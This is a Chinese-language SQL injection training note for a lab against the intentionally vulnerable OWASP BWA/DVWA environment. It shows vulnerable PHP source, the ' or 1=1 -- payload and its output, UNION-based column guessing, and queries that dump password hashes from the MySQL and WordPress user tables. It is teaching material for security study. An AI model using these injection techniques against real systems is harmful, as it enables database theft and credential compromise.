4.sql注入攻击(OWASP实战训练)
- 引言
- 1,实验环境owasp,kali Linux。
- 2,sql注入危害
- 3,sql基础回顾
- 4,登录owasp
- 5,查询实例
- (1)简单查询实例
- (2)条件查询实例
- (3)联合查询UNION
- 6,如何猜前面字段数
- 总结:
引言
Sql注入是注入漏洞的榜首
注入漏洞危害极大,sql注入为其中一种是我们常见的。
在owasp年度top10安全问题中,注入高居榜首,sql注入攻击是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是sql语法的一些组合,通过执行sql语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
1,对于web应用程序而言,用户核心数据存储在数据库中,例如MySQL、sqlserver、Oracle;
2,通过sql注入攻击。可以获取、修改、删除数据库信息,并且通过提权来控制web服务器等其他操作;
3,Sql注入即攻击者通过构造特殊的sql语句,入侵目标系统,致使后台数据库泄露数据的过程
4,因为sql注入漏洞造成严重危害性,所以常年稳居owasp top10的榜首
网站后台管理员账号也在数据库中,数据库重点攻击的方面,游戏拖库,等等。我们平常在京东或者双11检索产品时,买个笔记本,选一些条件(内存,品牌),其实我们点击按钮后就是一条sql语句,只是里面加了一些条件,包括下单也是sql语句(数据库的update操作)
Sql语句不能随便改的,sql语句是写在后端的,前端源码是可以拿到的,后端不能拿到也不能改,前端的代码是可以改的,后端不能改。如前端限制只能输入30个字符,我们可以在发送请求时将其改掉。后端代码是看不到的,后端代码交给中间件处理,交给webserver由其作出响应。这边看到的只是前端的东西。
我们在搜索框中搜索东西,其实执行的sql语句写死的,可能接受的品牌厂商,已经写好厂商华为或者联想。
1,实验环境owasp,kali Linux。
2,sql注入危害
- 拖库导致用户数据泄露;(电话,身份证信息等)
- 危害web等应用的安全(如网站)
- 失去操作系统的控制权
- 用户信息被非法买卖
- 危害企业及国家安全
3,sql基础回顾
Sql语句必须了解,主要是select语句
(1)打开sql injection模块
(2)输入1提交
ID: 1
First name: admin
Surname: admin
(3)打开源代码查看
<?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); $num = mysql_numrows($result); $i = 0; while ($i < $num) { $first = mysql_result($result,$i,"first_name"); $last = mysql_result($result,$i,"last_name"); echo '<pre>'; echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; echo '</pre>'; $i++; }
}
?>
Sql注入是希望其查一些我们希望要的东西,表象看到的是改不了,而我们sql注入就是在其看起来不能改的情况下去改。改完以后是不能将其sql语句删除的,只能在输入的地方做一些特殊构造,来实现不可告人的目的。
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
比如想要查别的表,在这条语句怎么输也查不了,拖库也就没戏,我们想要的是将其整个数据库拿下。
在输入框中输入 ' or 1=1 -- dddddd 下方会出现
ID: ' or 1=1 -- dddddd
First name: admin
Surname: admin
ID: ' or 1=1 -- dddddd
First name: Gordon
Surname: Brown
ID: ' or 1=1 -- dddddd
First name: Hack
Surname: Me
ID: ' or 1=1 -- dddddd
First name: Pablo
Surname: Picasso
ID: ' or 1=1 -- dddddd
First name: Bob
Surname: Smith
ID: ' or 1=1 -- dddddd
First name: user
Surname: user
按照原来的套路只能查询id为1的用户,而现在查询了所有的信息,这个是对方不愿给你的,但我们一步步做到了。
Sql注入很有用也很强大,一旦你的数据库有注入点,那么所有的数据都会被抱走。
刚才的行为就是构造了一个特殊的输入。
4,登录owasp
项目环境:owasp
表1:dvwa.user
表2:wordpress.wp_users
表3:mysql.user
root@owaspbwa:~# mysql -uroot -powaspbwa
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 582
Server version: 5.1.41-3ubuntu12.6-log (Ubuntu)Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| .svn |
| bricks |
| bwapp |
| citizens |
| cryptomg |
| dvwa |
| gallery2 |
| getboo |
| ghost |
| gtd-php |
| hex |
| isp |
| joomla |
| mutillidae |
| mysql |
| nowasp |
| orangehrm |
| personalblog |
| peruggia |
| phpbb |
| phpmyadmin |
| proxy |
| rentnet |
| sqlol |
| tikiwiki |
| vicnum |
| wackopicko |
| wavsepdb |
| webcal |
| webgoat_coins |
| wordpress |
| wraithlogin |
| yazd |
+--------------------+
34 rows in set (0.55 sec)
mysql> select database(); //查看当前所在库
+------------+
| database() |
+------------+
| NULL |
+------------+
1 row in set (0.00 sec)
mysql> select user(); //此函数返回当前用户
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select now(); //返回当前时间mysql> use dvwa; 进入库
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables; 查看有哪些表
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
2 rows in set (0.00 sec)
mysql> DESCRIBE users; 大写可以补全,查看特定表结构
+------------+-------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+------------+-------------+------+-----+---------+-------+
| user_id | int(6) | NO | PRI | 0 | |
| first_name | varchar(15) | YES | | NULL | |
| last_name | varchar(15) | YES | | NULL | |
| user | varchar(15) | YES | | NULL | |
| password | varchar(32) | YES | | NULL | |
| avatar | varchar(70) | YES | | NULL | |
+------------+-------------+------+-----+---------+-------+
6 rows in set (0.00 sec)
//这个看的是表的结构,查数据依托表结构才能查,如类型数字、字符。
mysql> show create table users\G 创建表 \G排序
DDL构造房屋框架
Bml对数据操作
DCL数据库控制语言,体现在授权、撤销权限
DQL数据库查询语言
mysql> select * from users; 从users表查询内容,可以\G让其格式有序
查字段是需要知道表的结构的
mysql> select user,password as avatar from users; avatar是别名
mysql> select user,password avatar from users; 用逗号隔开是字段,后面空着相当于上面的别名,加个逗号就是三个字段了如下
mysql> select user,password,avatar from users;
我们的sql注入就是select语句别的是不需要的。
5,查询实例
(1)简单查询实例
当前库dvwa dvwa.users
mysql> select * from users;
mysql> select user_id,first_name,last_name from users;
其他库 mysql.user
mysql> desc mysql.user;
mysql> select * from mysql.user;
mysql> select user,password,host from mysql.user;
其他库 wordpress.user
mysql> desc wordpress.user;
mysql> select * from wordpress.user;
mysql> select user,password,host from wordpress.user;
(2)条件查询实例
mysql> select user,password,host from mysql.user where user=’root’;
mysql>select user,password,host from mysql.user where user=’root’and host = ’localhost’;
mysql> select user,password,host from mysql.user where user=’root’or host = ’localhost’;
mysql> desc dvwa.users;
mysql> select user_id,first_name,last_name from dvwa.users where first_name = 'yangge';
mysql> select user_id,first_name,last_name from dvwa.users where first_name = 'yangge' or 1=1;
mysql> select user_id,first_name,last_name from dvwa.users where first_name = 'admin' and 1=2;
注意:若输入不正确在数据库中语句,可能是单引号是中文的原因
mysql> select user_id,first_name,last_name from dvwa.users where user_id=2;
mysql> select user_id,first_name,last_name from dvwa.users where user_id=7;
mysql> select user_id,first_name,last_name from dvwa.users where user_id=7 or 1=1;
(3)联合查询UNION
mysql> select user,password from mysql.user;
mysql> select user_login,user_pass from wordpress.wp_users;
mysql> select user,password from mysql.user union select user_login,user_pass from wordpress.wp_users;mysql> select user,password,host from mysql.user union select user_login,user_pass from wordpress.wp_users;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
注意:union查询前后字段数必须相同,如下
mysql> select user,password,host from mysql.user union select user_login,user_pass,3 from wordpress.wp_users;
在mysql中不加引号表示字段
Select user,password,host from mysql.user where user=password;
//此句语法没错,但是password未加引号,把他当成了字段从两张表里寻找,加上引号表示字段的值
Select user,password,host from mysql.user where a.user=b.password;
//
Select user,password,host from mysql.user where user=’root’;
//选择user字段的值为root的从mysql数据库的user表中
Select user,password,host from mysql.user where user_id=1;
纯数字不能作为字段,一定是个值,加引号有可能将其作为字符串对待。
Sql注入有个大前提原来的语句动不了,只能自己加戏如
mysql> select user_id,first_name,last_name from dvwa.users where first_name = 'yangge';
这句话在数据库中是找不到的
mysql> select user_id,first_name,last_name from dvwa.users where first_name = 'yangge' or 1=1;
这句话是可以显示内容的,只是为了构造一个为真的条件,1=1是最简单的条件
我们在上一小节中讲到的在输入框中输入 ’ or 1=1 – dddddd
从源码可知
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
上面的话变成了下面的
SELECT first_name, last_name FROM users WHERE user_id = '$id' or‘1=1’
之前是查询id号,则id就是where后的限制条件,我们将后面的条件变为真,就会将此表中的所有数据都显示出来
有些东西不能改变的就不要改变了,就改自己能改的
这是sql注入最初的样子
mysql> select user_id,first_name,last_name from dvwa.users where user_id=7 or 1=1;
假如我们让其条件为真了,是表的所有内容吗?不是,前面的字段是别人写死的,表也是别人写死的,最多最多能返回这个表中这些字段的所有值。并不是我们想要的所有东西,无论怎么玩都只是这些东西。但我们想要拖库。
这段命令不能查询别的表,这个条件只能查询这一张表,所以我们要是用union再联合一个查询语句。
我们要自加sql语句前面只能在其自己限定的表中查询,而后面可以再加一张表查询
Union并不复杂只是再加一条sql语句
mysql> select user,password,host from mysql.user union select user_login,user_pass from wordpress.wp_users;
ERROR
注意:union查询前后字段数必须相同,如下
mysql> select user,password,host from mysql.user union select user_login,user_pass,3 from wordpress.wp_users;
但是会出错,前面的字段数我们并不知道,也不能改,所以要试错,再加一个字段(数字即可,数字是可以充当字段的)
1,第一并不知道前面字段数
2,后面字段是什么也不知道
3,如果知道前面有5个字段的话,怎么去给后面字段补上5个,如何补齐字段,用数字凑
我们有个大神information_schema数据库字典
为什么sql注入学不会,需要一步一步来,我们要达到看懂的地步。
还有问题要声明一下,
mysql> select user,password,host from mysql.user union select user_login,user_pass,1 from wordpress.wp_users limit 5;
+------------------+-------------------------------------------+---------------+
| user | password | host |
+------------------+-------------------------------------------+---------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 | localhost |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | brokenwebapps |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | 127.0.0.1 |
| debian-sys-maint | *75F15FF5C9F06A7221FEB017724554294E40A327 | localhost |
| phpmyadmin | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | localhost |
+------------------+-------------------------------------------+---------------+
5 rows in set (0.00 sec)
上面这条语句只是查看前5行的数据,有时数据太多可能成百上千行,我们要限制行数,还有显示的内容是以前面3个字段为主的,而我们想要的是后面字段的内容,可以将前面的内容否定掉如下
mysql> select user,password,host from mysql.user where 1=2 union select user_login,user_pass,1 from wordpress.wp_users limit 5;
+-------+----------------------------------+------+
| user | password | host |
+-------+----------------------------------+------+
| admin | 21232f297a57a5a743894a0e4a801fc3 | 1 |
| user | ee11cbb19052e40b07aac0ca060c23ee | 1 |
+-------+----------------------------------+------+
2 rows in set (0.00 sec)
前面的只是我们借着来查询后面的数据,不要在意字段名,而要关注内容值。
6,如何猜前面字段数
思考:前面的查询已经写死了,如何使下面的语句成功?
mysql> select * from dvwa.users;
> union
> mysql> select user_login,user_pass from wordpress.wp_user;
方法:猜字段数
mysql> select * from dvwa.users union select 1;
mysql> select * from dvwa.users union select 1,2;
mysql> select * from dvwa.users union select 1,2,3;
mysql> select * from dvwa.users union select 1,2,3,4;
mysql> select * from dvwa.users union select 1,2,3,4,5;
mysql> select * from dvwa.users union select 1,2,3,4,5,6;
mysql> select * from dvwa.users union select user_login,user_pass,1,2,3,4 from wordpress.wp_user;
如果对前面的不关注,就加上1=2不成立的条件,只显示后面的表。
总结:
1,使用或,布尔方式,另其1=1,只能查它限制的表,想到别的地方去做不到
2,使用union,自己再加一条select语句可以查别的,但也会受到权限的限制,人家开发人员已经定义好了,让哪个用户去连接哪个库。如果此用户只对某个库有权限,可以查这个库所有数据,若对所有库都有权限,都能查询。查询时,一般情况下,对当前查询的库有所有权限。
不要想着拿到一个账号可以拿到其他所有的库,一个mysql数据库可能有很多业务库但能不能都拿到不好说。
可能有的人觉得sql注入太麻烦,有手工注入,也有自动注入(程序帮自己尝试)
)
)
